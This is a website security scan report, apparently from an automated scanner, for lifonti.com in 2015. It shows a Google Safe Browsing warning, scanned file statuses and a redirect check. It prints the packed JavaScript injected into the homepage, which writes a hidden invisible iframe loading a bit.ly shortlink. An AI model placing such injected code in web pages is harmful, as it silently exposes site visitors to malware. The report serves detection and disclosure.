Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lifonti.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lifonti.com/ | 200 OK Content-Length: 35866 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3(\'<1 4="5://6.7/8" 9="0" a="0" b="0" c=0 d=0></1>\');',14,14,'|iframe|document|write|src|http|bit|ly|1BC4pKP|width|height|frameborder|marginwidth|marginheight'.split('|'),0,{})) Antivirus reports:
| ||
http://www.lifonti.it/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=4.0.1 | 200 OK Content-Length: 17060 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.0.1 | 200 OK Content-Length: 55197 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.3 | 200 OK Content-Length: 9658 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/jquery.fancybox.pack.js?ver=4.0.1 | 200 OK Content-Length: 19865 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/fancybox/helpers/jquery.fancybox-buttons.js?ver=4.0.1 | 200 OK Content-Length: 2876 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/fancybox/helpers/jquery.fancybox-thumbs.js?ver=4.0.1 | 200 OK Content-Length: 3821 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/fancybox/helpers/jquery.fancybox-media.js?ver=4.0.1 | 200 OK Content-Length: 3242 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/ddsmoothmenu.js?ver=4.0.1 | 200 OK Content-Length: 7215 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/selectnav.js?ver=4.0.1 | 200 OK Content-Length: 1568 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/jquery.easytabs.js?ver=4.0.1 | 200 OK Content-Length: 25586 Content-Type: text/javascript | clean |
http://www.lifonti.it/wp-content/themes/skybox/style/js/jquery.isotope.min.js?ver=4.0.1 | 200 OK Content-Length: 15876 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lifonti.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 14:47:31 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/P-sM>; rel=shortlink
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=lifonti.com
X-Pingback: http://www.lifonti.it/xmlrpc.php
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: lifonti.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 14:47:31 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Link: <http://wp.me/P-sM>; rel=shortlink
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=lifonti.com
X-Pingback: http://www.lifonti.it/xmlrpc.php
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: lifonti.com
Referer: http://www.google.com/search?q=lifonti.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lifonti.com
Referer: http://www.google.com/search?q=lifonti.com
Result:
The result is similar to the first query. There are no suspicious redirects found.